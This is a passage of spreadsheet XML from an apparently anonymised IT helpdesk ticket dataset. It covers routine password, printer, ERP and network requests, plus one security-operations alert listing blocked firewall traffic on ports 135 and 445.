    <s v="hello team,_x000d__x000a__x000d__x000a_please install analysis office 2.2 sp 03 in clrgtydia's pc since office version is 2016 and set up hana SID_60/ SID_59 connections._x000d__x000a__x000d__x000a_at present, xawlkiey demjqrfl's pc has ao 1.4 which is not compatible with office 2016._x000d__x000a__x000d__x000a_issue is sev 2._x000d__x000a__x000d__x000a_best "/>
    <s v="xawlkiey demjqrfl"/>
    <x v="8"/>
  </r>
  <r>
    <s v="skype for business extend access to external partners"/>
    <s v="_x000d__x000a__x000d__x000a_received from: sbgvrncj.idfhtoqv@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a_please extend the skype for business access of przcxbml vnjdghui (a contractor) so that she is able to arrange conference calls with external company parties. she is working on a critical company payroll project for germany that involves significant external vendor contact so her skype permissions should be set the same as mine._x000d__x000a_many "/>
    <s v="sbgvrncj idfhtoqv"/>
    <x v="26"/>
  </r>
  <r>
    <s v="unable to change password on password_management_tool password manager"/>
    <s v="unable to change password on password_management_tool password manager"/>
    <s v="khaibsvt lkvfxzpj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="konto resetten"/>
    <s v="konto resetten"/>
    <s v="ughzilfm cfibdamq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp &amp; business_client password reset request"/>
    <s v="_x000d__x000a__x000d__x000a_received from: svbymfiz.afqvyuwh@gmail.com_x000d__x000a__x000d__x000a_dear sir,_x000d__x000a__x000d__x000a_please help to reset my password for erp SID_34 &amp; business_client_x000d__x000a__x000d__x000a_"/>
    <s v="svbymfiz afqvyuwh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="windows password reset"/>
    <s v="windows password reset"/>
    <s v="koiapqbg teyldpkw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account unlock"/>
    <s v="account unlock"/>
    <s v="jsmhzqpo bpexofya"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset"/>
    <s v="password reset"/>
    <s v="gadbpfrz unvdyask"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to launch outlook"/>
    <s v="unable to launch outlook"/>
    <s v="vjwdyanl knfsjdgz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset to hub"/>
    <s v="password reset to hub"/>
    <s v="wducnbfp wxiqjuce"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp problem "/>
    <s v="_x000d__x000a__x000d__x000a_received from: bajrpckl.cevtiuob@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a__x000d__x000a_   i am not able to see more than the below list in va35._x000d__x000a__x000d__x000a_[cid:image001.jpg@01d20941.19746b70]_x000d__x000a__x000d__x000a_"/>
    <s v="bajrpckl cevtiuob"/>
    <x v="0"/>
  </r>
  <r>
    <s v="what's the meaning of this &quot;warning message&quot;"/>
    <s v="_x000a__x000a_received from: zywoxerf.paqxtrfk@gmail.com_x000a__x000a_dear help desk:_x000a__x000a_i'd like to know what's the meaning of the following &quot;warning message&quot; when i click on engineering tool and after login._x000a__x000a_[cid:image001.jpg@01d208e8.d36cbf40]_x000a__x000a_x.  jdamieul  fandyhgg_x000a__x000a_phd, us patent agent_x000a_senior staff engineer_x000a__x000a_zywoxerf.paqxtrfk@gmail.com_x000a_"/>
    <s v="zywoxerf paqxtrfk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 account unlock"/>
    <s v="name:mfeyouli ndobtzpw_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:mfeyouli.ndobtzpw@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:please reset erp. SID_34 for boivin"/>
    <s v="mfeyouli ndobtzpw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="constantly receiving &quot;usb device not recognized&quot; and i have to install my default printer driver after every reboot"/>
    <s v="constantly receiving &quot;usb device not recognized&quot; and i have to install my default printer driver after every reboot  (cl92)"/>
    <s v="rcivkdxo hlyrieck"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to log on to distributor_tool."/>
    <s v="unable to log on to distributor_tool."/>
    <s v="zlnxswvp ptmzsbhk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="supply_chain_software"/>
    <s v="_x000d__x000a__x000d__x000a_received from: cjsukemx.lqkcesuf@gmail.com_x000d__x000a__x000d__x000a_please reset my supply_chain_software password._x000d__x000a__x000d__x000a_"/>
    <s v="cjsukemx lqkcesuf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vpn query"/>
    <s v="vpn query. user wanted to know if he can connect to vpn."/>
    <s v="aqdjcuhn lagfitkz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="cannot log into erp SID_34 erp production with new password - need access "/>
    <s v="_x000a__x000a_received from: yisohglr.uvteflgb@gmail.com_x000a__x000a_hi -_x000a__x000a_i recently changed my password and i tried to log into erp but i keep receiving a message that login is no longer possible and there are too many failed attempts (i only tried to log in one time).   when i changed my password, i also received an error message that the password change failed - see attached.the new password works for all the other applications on my computer except for erp.   i use erp on a daily basis and need to access SID_34 erp production._x000a__x000a_my user id is rubyfgty so please let me know if you can help with this issue._x000a__x000a_"/>
    <s v="yisohglr uvteflgb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login to skype"/>
    <s v="unable to login to skype"/>
    <s v="iotudrxg odpcwvez"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to launch ethics."/>
    <s v="unable to launch ethics. login credentials invalid error._x000a__x000a_1. primary smtp address: from outlook address book - karghyuen.hasghyusan@company.com_x000a__x000a_2. new to company/ returned after resignation/account changed from temp to permanent? no_x000a__x000a_3. taken ethics before? received email from .ethics to take the ethics course? any organizational change? yes. my email address                              used to be htsnaodb.adjtmlzn@gmail.com  starting in fy17, i was moved to company._x000a__x000a_4. any name change / email address change? email address change. my email address used to be htsnaodb.adjtmlzn@gmail.com  starting in fy17, i was moved to company._x000a__x000a_5. any medial leave/leave of absence recently? no_x000a_"/>
    <s v="htsnaodb adjtmlzn"/>
    <x v="23"/>
  </r>
  <r>
    <s v="  also, the account needs to be given to davgtgyrh smgnhyleck."/>
    <s v="bhghtyum,_x000a_                i will need additional time, please do not delete this account on september 9th.  also, the account needs to be given to davgtgyrh smgnhyleck._x000a_"/>
    <s v="fabijhsd ocsnugeh"/>
    <x v="19"/>
  </r>
  <r>
    <s v="windows password reset"/>
    <s v="windows password reset"/>
    <s v="ujtmipzv cwdzunxs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password locked out on erp SID_34"/>
    <s v="password locked out on erp SID_34"/>
    <s v="kcwqdeob jwtpkzub"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 account unlock"/>
    <s v="erp SID_34 account unlock"/>
    <s v="gljkfidc kelctrpf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook not updating emails"/>
    <s v="outlook not updating emails"/>
    <s v="bmudkpie qolrvbip"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update for inplant_858062"/>
    <s v="ticket update for inplant_858062"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="freigabe auf ordner fÃ¼r ytcxjzue guplftok (krafghyumec1) und zbijdqpg ehpjkwio (dinktyhed)"/>
    <s v="unter departments (\\HostName_579) (m:) unter info/freigabe ordner beschichtung mit allen unterordnern "/>
    <s v="lzpuyrvw zkxbacvn"/>
    <x v="33"/>
  </r>
  <r>
    <s v="change screensaver company to company"/>
    <s v="please change my screensaver to company._x000d__x000a_pc name: ekql700085_x000d__x000a__x000d__x000a_"/>
    <s v="btvmxdfc yfahetsc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="network problems (multiple applications are running slow) EU_tool and downloads lists to vmsliazh ltksxmyv"/>
    <s v="how did you determine there are network problems ? if i want ot download lists to vmsliazh ltksxmyv interrogates (questioning) time out is coming. the same with EU_tool. if we want to print labels the same error is coming_x000d__x000a__x000d__x000a_are more than one transactions impacted? _x000d__x000a__x000d__x000a_what server are you on?  vmsliazh ltksxmyv_x000d__x000a_do other co-workers also notice slow response times in erp ? yes, we have problems too in our shipment department_x000d__x000a__x000d__x000a_"/>
    <s v="zcokibmd xnrthsmj"/>
    <x v="58"/>
  </r>
  <r>
    <s v="printer cl98"/>
    <s v="_x000a__x000a_received from: azxhejvq.fyemlavd@gmail.com_x000a__x000a_good morning_x000a__x000a_i have made several attempts to print to printer cl98.  i have also powered the device down then back up. and retried printing.  no print but the printer drivers are refreshed._x000a_had a colleague try and she had the same results_x000a__x000a_i deleted the printer cl98 from my pc and reinstalled it.  it reinstalled as prtgn0022.  when i printed to it the print came out successfully._x000a__x000a_how can a printer be changed from cl98 to gn22 without notification?  should this printer be known as gn22 or is this a error that requires further investigation?_x000a__x000a_mikhghytr wafglhdrhjop_x000a__x000a__x000a_"/>
    <s v="azxhejvq fyemlavd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp-step interface programdnty not sending all ebom data to step"/>
    <s v="erp-step interface programdnty is not generating idoc data for all ebom items. 5 examples below._x000d__x000a_mm#s 3313551 and 3313561 is not sending step all the ebom data.  we are missing the ebom insert screw. also we have the same issue with missing ebom items (screws) for mm# 6235933, 6235934, 6235935._x000d__x000a__x000d__x000a_.  erp data_x000d__x000a_below is a list of the bom items for the materials in question.  i do know that both ms2006 and ms2005 are material type raw material.  i thought that you were able to show the data in the bom regardless of the material type, but that could be the issue.  the ebom is showing what is on the drawings, and the ebom is created, so i'm not certain why the materials force didn't work.  joe uses the same programdnty that i do to force product._x000d__x000a__x000d__x000a_material number      ansi code            position             component material   ansi of component   _x000d__x000a_6235933 krcscfpr061y                   0010                 2010829 ms2006                        _x000d__x000a_6235933 krcscfpr061y                   0020                 2010831 ms2005                        _x000d__x000a_6235933 krcscfpr061y                   0030                 2132602 ft7                           _x000d__x000a_6235933 krcscfpr061y                   0040                 2132604 ft8                           _x000d__x000a_6235934 krcscfpr062y                   0010                 2010829 ms2006                        _x000d__x000a_6235934 krcscfpr062y                   0020                 2010831 ms2005                        _x000d__x000a_6235934 krcscfpr062y                   0030                 2132602 ft7                           _x000d__x000a_6235934 krcscfpr062y                   0040                 2132604 ft8                           _x000d__x000a_6235935 krcscfpr063y                   0010                 2010829 ms2006                        _x000d__x000a_6235935 krcscfpr063y                   0020                 2010831 ms2005                        _x000d__x000a_6235935 krcscfpr063y                   0030                 2132602 ft7                           _x000d__x000a_6235935 krcscfpr063y                   0040                 2132604 ft8                           _x000d__x000a__x000d__x000a_step data_x000d__x000a_                                                    bom_0020            bom_0030                            bom_0040_x000d__x000a_3313551 krbb10scfpr06085c 2132602:ft7:torx wrench_engineering_tool  _x000d__x000a_3313561 krbb10scfpr06110c 2132602:ft7:torx wrench_engineering_tool  _x000d__x000a_6235933 krcscfpr061y                                             2132602:ft7:torx wrench_engineering_tool 2132604:ft8:torx wrench_engineering_tool_x000d__x000a_6235934 krcscfpr062y                                             2132602:ft7:torx wrench_engineering_tool 2132604:ft8:torx wrench_engineering_tool_x000d__x000a_6235935 krcscfpr063y                                             2132602:ft7:torx wrench_engineering_tool 2132604:ft8:torx wrench_engineering_tool_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="rcivkdxo hlyrieck"/>
    <x v="10"/>
  </r>
  <r>
    <s v="need to configure printers tc47 and tc19"/>
    <s v="need to configure printers tc47 and tc19"/>
    <s v="akzyhdlg pguazhbs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset passwords for mafgtnik -0 using password_management_tool password reset."/>
    <s v="the"/>
    <s v="plzsntqj ujdyobsk"/>
    <x v="16"/>
  </r>
  <r>
    <s v="unable to extend the display on external monitor"/>
    <s v="unable to extend the display on external monitor"/>
    <s v="qftpazns fxpnytmk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="circuit outage :germany,germany-divestiture site vpn rtr 02 is down at 08:04 am et 09/07,site is up on vpn rtr 01."/>
    <s v="what type of outage:  _____network     __x___circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ___no______     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ________at 08:04 am et 09/07______________x000d__x000a__x000d__x000a_3.  scheduled maintenance ( power) ? _____no__    (yes/no/na)     company power  _________     provider power __________x000d__x000a_                _x000d__x000a_4.  scheduled maintenance ( network) ---------------no------------(yes/no/na)     company maint________ (yes/no)       provider maint/ticket #__________________    _x000d__x000a__x000d__x000a_5. does site have a backup circuit ?  __yes______ (yes/no/na) _x000d__x000a__x000d__x000a_6. backup circuit active ?   ______yes__     (yes/no/na) _x000d__x000a__x000d__x000a_7. site contact notified (phone/email) ?  _________     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   ____na_______   (yes/no/na) _x000d__x000a__x000d__x000a_9. equipment reset ?    __na__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reset passwords for cÃ©sar abreu rghkiriuytes using password_management_tool password reset."/>
    <s v="the"/>
    <s v="btvmxdfc yfahetsc"/>
    <x v="16"/>
  </r>
  <r>
    <s v="unable to launch netweaver"/>
    <s v="unable to launch netweaver"/>
    <s v="sprzgqyv uxpjtgaw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to print from adobe"/>
    <s v="unable to print from adobe"/>
    <s v="sprzgqyv uxpjtgaw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype meeting code/pin"/>
    <s v="need ability to create skype meetings through outlook."/>
    <s v="ovpuqfaj pqruovit"/>
    <x v="0"/>
  </r>
  <r>
    <s v="hr_tool etime will not run after update ran last night, it asks for adobe flash which i tried to install several times"/>
    <s v="immediate need"/>
    <s v="nrmjhuox ktuyqewp"/>
    <x v="2"/>
  </r>
  <r>
    <s v="job Job_593 failed in job_scheduler at: 09/07/2016 07:52:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_593 failed in job_scheduler at: 09/07/2016 07:52:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="windows password reset"/>
    <s v="windows password reset"/>
    <s v="mdrguhox qczwadyx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="problleme mit EU_tool \we212571 \bejvhsfx dmvsclhp"/>
    <s v="problleme mit EU_tool \we212571 \bejvhsfx dmvsclhp"/>
    <s v="bejvhsfx dmvsclhp"/>
    <x v="24"/>
  </r>
  <r>
    <s v="battery charging issue"/>
    <s v="battery charging issue"/>
    <s v="jvpkulxw ovuweygj"/>
    <x v="18"/>
  </r>
  <r>
    <s v="need vpn access"/>
    <s v="need vpn access. new employee has a company laptop. emzlw800043"/>
    <s v="vrdjzswx rlweqdhs"/>
    <x v="33"/>
  </r>
  <r>
    <s v="reset passwords for reghythicsa purvis using password_management_tool password reset."/>
    <s v="i just need to reset my password for the interaction desktop / telephony_software.  user name is pughjuvirl"/>
    <s v="ncjispka wspgujxm"/>
    <x v="6"/>
  </r>
  <r>
    <s v="unlock account lichtyuiwu7"/>
    <s v="unlock account lichtyuiwu7"/>
    <s v="aorthyme rnsuipbk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="production order 'grade' is partially printed in hebrew."/>
    <s v="EMEA: production order 'grade' is partially printed in hebrew. please see example attached. in en it is printed fully."/>
    <s v="wqfzjycu omleknjd"/>
    <x v="20"/>
  </r>
  <r>
    <s v="java issue"/>
    <s v="unable to continue the java update"/>
    <s v="ejmdqfbl xuqkwdfa"/>
    <x v="18"/>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kd05 (ex hq50 â€“ wy98 - hp 8150) _x000d__x000a_ _x000d__x000a_   â€¢  detailed description of the problem ?can not install driver to use this printer._x000d__x000a__x000d__x000a_   â€¢  type of documents not printing?  (email â€“ excel â€“ wordâ€¦etc) any_x000d__x000a_      (inwarehouse_tool â€“ delivery note â€“ production orderâ€¦etc)_x000d__x000a__x000d__x000a_   â€¢  what system or application being used at time of the problem? outlook, word     (ex windows / erp /kls)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zgdvhfop kbrmfcog"/>
    <x v="0"/>
  </r>
  <r>
    <s v="security incidents - ( #in33578632) : suspicious ms-rpc/ms-ds/netbios activity - HostName_17"/>
    <s v="source ip: 29.26.13.3095_x000d__x000a_source hostname: HostName_17_x000d__x000a_destination hostname: lmxl9516623_x000d__x000a_user  name:_x000d__x000a_location :_x000d__x000a_sep , sms status :_x000d__x000a_field sales user ( yes / no) :  _x000d__x000a_dsw event log:_x000d__x000a_-------------------------------------------------------------------------------------------------------------------------------------------_x000d__x000a_we have detected at least 269 occurrences of your firewall att-apac-asa.company.com-1/54.96.80.216 dropping traffic sourcing from HostName_17/29.26.13.3095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_x000d__x000a__x000d__x000a_sincerely,_x000d__x000a_ soc_x000d__x000a_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tryung_x000d__x000a__x000d__x000a_additional information on these ports and best practices can be found at the following sites:_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_=========================_x000d__x000a_references_x000d__x000a_=========================_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_=========================_x000d__x000a_event data_x000d__x000a_=========================_x000d__x000a_related events: _x000d__x000a_event id: 93605481_x000d__x000a_event summary: internal outbreak for 135/tcp_x000d__x000a_occurrence count: 269_x000d__x000a_event count: 2_x000d__x000a__x000d__x000a_host and connection information_x000d__x000a_source ip: 29.26.13.3095_x000d__x000a_source hostname: HostName_17_x000d__x000a_source port: 56991_x000d__x000a_destination hostname: lmxl9516623_x000d__x000a_destination port: 135_x000d__x000a_connection directionality: internal_x000d__x000a_protocol: tcp_x000d__x000a__x000d__x000a_device information_x000d__x000a_device ip: 54.96.80.216_x000d__x000a_device name: att-apac-asa.company.com-1_x000d__x000a_log time: 2016-09-07 at 09:16:25 utc_x000d__x000a_action: blocked_x000d__x000a_cvss score: -1 _x000d__x000a__x000d__x000a_scwx event processing information_x000d__x000a_sherlock rule id (sle): 537074_x000d__x000a_inspector rule id: 186739_x000d__x000a_inspector event id: 886845862_x000d__x000a_ontology id: 200020003203009144_x000d__x000a_event type id: 200020003203009044_x000d__x000a_agent id: 103955_x000d__x000a__x000d__x000a_event detail:_x000d__x000a_sep 7 09:16:25 54.96.80.216 %asa-2-106001: inbound tcp connection denied from 29.26.13.3095/56991 to 10.10.6.61/135 flags syn on interface inside_x000d__x000a_sep 7 09:16:31 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57004 dst outside:192.168.1.131/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_sep 7 09:16:34 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57017 dst outside:192.168.0.17/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_sep 7 09:16:42 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57050 dst outside:192.168.2.101/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_sep 7 09:16:56 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57072 dst outside:192.168.1.141/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_sep 7 09:16:58 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57077 dst outside:192.168.1.101/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_sep 7 09:17:01 54.96.80.216 %asa-2-106001: inbound tcp connection denied from 29.26.13.3095/57083 to 10.254.255.39/135 flags syn on interface inside_x000d__x000a_sep 7 09:17:02 54.96.80.216 %asa-2-106001: inbound tcp connection denied from 29.26.13.3095/57086 to 10.240.84.111/135 flags syn on interface inside_x000d__x000a_sep 7 09:17:14 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57099 dst outside:192.168.1.94/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_sep 7 09:17:24 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57123 dst outside:192.168.1.107/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_sep 7 09:17:31 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57135 dst outside:192.168.0.103/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_sep 7 09:17:37 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57146 dst outside:172.16.100.30/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_sep 7 09:17:44 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57168 dst outside:192.168.1.128/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_sep 7 09:17:48 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57190 dst outside:192.168.1.14/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_sep 7 09:17:49 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57194 dst outside:192.168.1.110/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_sep 7 09:17:51 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57199 dst outside:192.168.1.234/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a__x000d__x000a_ascii packet(s):_x000d__x000a_[no entry]_x000d__x000a__x000d__x000a_hex packet(s):_x000d__x000a_[no entry]_x000d__x000a__x000d__x000a_event id: 93605486_x000d__x000a_event summary: internal outbreak for 135/tcp_x000d__x000a_occurrence count: 269_x000d__x000a_event count: 2_x000d__x000a__x000d__x000a_host and connection information_x000d__x000a_source ip: 29.26.13.3095_x000d__x000a_source hostname: HostName_17_x000d__x000a_source port: 56991_x000d__x000a_destination hostname: [no entry]_x000d__x000a_destination port: 135_x000d__x000a_connection directionality: internal_x000d__x000a_protocol: tcp_x000d__x000a__x000d__x000a_device information_x000d__x000a_device ip: 54.96.80.216_x000d__x000a_device name: att-apac-asa.company.com-1_x000d__x000a_log time: 2016-09-07 at 09:16:25 utc_x000d__x000a_action: blocked_x000d__x000a_cvss score: -1 _x000d__x000a__x000d__x000a_scwx event processing information_x000d__x000a_sherlock rule id (sle): 537074_x000d__x000a_inspector rule id: 186739_x000d__x000a_inspector event id: 886845862_x000d__x000a_ontology id: 200020003203009144_x000d__x000a_event type id: 200020003203009044_x000d__x000a_agent id: 103955_x000d__x000a__x000d__x000a_event detail:_x000d__x000a_sep 7 09:16:32 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57007 dst outside:192.168.1.131/445 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_sep 7 09:16:35 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57023 dst outside:192.168.0.17/445 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_sep 7 09:16:39 54.96.80.216 %asa-2-106001: inbound tcp connection denied from 29.26.13.3095/57040 to 10.70.120.71/445 flags syn on interface inside_x000d__x000a_sep 7 09:16:43 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57053 dst outside:192.168.2.101/445 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_sep 7 09:16:46 54.96.80.216 %asa-2-106001: inbound tcp connection denied from 29.26.13.3095/57057 to 10.10.6.61/445 flags syn on interface inside_x000d__x000a_sep 7 09:16:58 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57076 dst outside:192.168.1.141/445 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_sep 7 09:16:59 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57079 dst outside:192.168.1.101/445 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_sep 7 09:17:15 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57102 dst outside:192.168.1.94/445 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_sep 7 09:17:22 54.96.80.216 %asa-2-106001: inbound tcp connection denied from 29.26.13.3095/57117 to 10.254.255.39/445 flags syn on interface inside_x000d__x000a_sep 7 09:17:23 54.96.80.216 %asa-2-106001: inbound tcp connection denied from 29.26.13.3095/57120 to 10.240.84.111/445 flags syn on interface inside_x000d__x000a_sep 7 09:17:25 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57126 dst outside:192.168.1.107/445 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_sep 7 09:17:32 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57137 dst outside:192.168.0.103/445 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_sep 7 09:17:39 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57150 dst outside:172.16.100.30/445 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_sep 7 09:17:45 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57177 dst outside:192.168.1.128/445 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_sep 7 09:17:47 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57185 dst outside:192.168.1.117/445 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_sep 7 09:17:49 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57193 dst outside:192.168.1.14/445 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a__x000d__x000a_ascii packet(s):_x000d__x000a_[no entry]_x000d__x000a__x000d__x000a_hex packet(s):_x000d__x000a_[no entry]_x000d__x000a__x000d__x000a__x000d__x000a_these appends may contain the same information as the original alert or may contain differences in the source destination pair. please view updates to this ticket via the portal. the security operations team will notify you as further information becomes available._x000d__x000a__x000d__x000a_ security analysis team_x000d__x000a_877"/>
    <s v="gzhapcld fdigznbk"/>
    <x v="2"/>
  </r>
  <r>
    <s v="spam call received from india."/>
    <s v="spam call received from india."/>
    <s v="fhxsowau nfybhaxg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="anleitung fuer password_management_tool password manager gebraucht."/>
    <s v="anleitung fuer password_management_tool password manager gebraucht."/>
    <s v="zmybfdqg cbwknmps"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job_scheduler workstation HostName_242"/>
    <s v="observerd fence &amp; limit are 0 for HostName_242"/>
    <s v="jloygrwh acvztedi"/>
    <x v="7"/>
  </r>
  <r>
    <s v="internet explorer update to version11"/>
    <s v="internet explorer update to version11"/>
    <s v="orjszque lukegwam"/>
    <x v="18"/>
  </r>
  <r>
    <s v="erp SID_34 account unlock and password reset"/>
    <s v="erp SID_34 account unlock and password reset"/>
    <s v="kwfiaztm bdytamoj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="simfghon wants to use the mail."/>
    <s v="owa configured._x000d__x000a_explained that outlook is also already installed."/>
    <s v="uhiekyjz mflihxpq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="we_wu101 account unlock."/>
    <s v="we_wu101 account unlock."/>
    <s v="ughzilfm cfibdamq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="i would like to download a free software called bizagi but i cannot due to some securities set up."/>
    <s v="i would like to download a free software called bizagi but i cannot due to some securities set up therefore i need your support "/>
    <s v="lkfzibrx ljnabpgx"/>
    <x v="32"/>
  </r>
  <r>
    <s v="data retrieval from backup server"/>
    <s v="_x000a__x000a_received from: vkzwibco.pueyvhoi@gmail.com_x000a__x000a_dear sir/madam,_x000a__x000a_some zipped folders of around 700-800 mb are missing from the following paths â€“_x000a__x000a_(HostName_95)_x000a__x000a_w:\zollerfgh - documents&lt;file:///\\HostName_95\grinding\zollerfgh%20-%20documents&gt;_x000a__x000a_w:\trial data\softwares\zollerfgh&lt;file:///\\HostName_95\grinding\trial%20data\softwares\zollerfgh&gt;_x000a__x000a_these had the data backup from zollerfgh genius machine and are required on an urgent basis now because the machine is in breakdown condition._x000a__x000a_please retrieve this data from back-up server._x000a__x000a_"/>
    <s v="vkzwibco pueyvhoi"/>
    <x v="11"/>
  </r>
  <r>
    <s v="cisco access point is not working."/>
    <s v="_x000a__x000a_received from: ughzilfm.cfibdamq@gmail.com_x000a__x000a_hallo ,_x000a__x000a_cisco access point is not working._x000a_mac address : 1819drtb8e64_x000a__x000a_"/>
    <s v="ughzilfm cfibdamq"/>
    <x v="3"/>
  </r>
  <r>
    <s v="cisco access point is not working."/>
    <s v="cisco access point is not working._x000a_mac address : 1819drtb8e64_x000a_"/>
    <s v="yevirgnl ylhogjct"/>
    <x v="3"/>
  </r>
  <r>
    <s v="account owner issue_please assign it to &quot;msd crm&quot; team"/>
    <s v="i discovered that there is an issue with account owner in msd._x000d__x000a_below examples of company accounts which have set up owner as company._x000d__x000a__x000d__x000a__x000d__x000a_erp customer # (account) (account) owner (account) (account)_x000d__x000a_81587672 company_x000d__x000a_81936758 company_x000d__x000a_81660515 company_x000d__x000a_81932598 company_x000d__x000a_81883649 company_x000d__x000a_81542410 company_x000d__x000a_81805412 company_x000d__x000a_"/>
    <s v="rcbdyslq zuspjbtw"/>
    <x v="39"/>
  </r>
  <r>
    <s v="it help"/>
    <s v="_x000d__x000a__x000d__x000a_received from: scjxobhd.ldypjkmf@gmail.com_x000d__x000a__x000d__x000a_hello help team,_x000d__x000a__x000d__x000a_can you pls. open a ticket._x000d__x000a_it help might be needed for a meeting scheduled at fÃ¼rth, room #1, on september 14 (start at 9:00 am) &amp; 15._x000d__x000a_the meeting will be conducted by two external trainers and they might need help to start their presentations (beamer)._x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="scjxobhd ldypjkmf"/>
    <x v="28"/>
  </r>
  <r>
    <s v="not able to open an xcel file."/>
    <s v="not able to open an xcel file._x000a_"/>
    <s v="dchzofyt kecxjvwq"/>
    <x v="0"/>
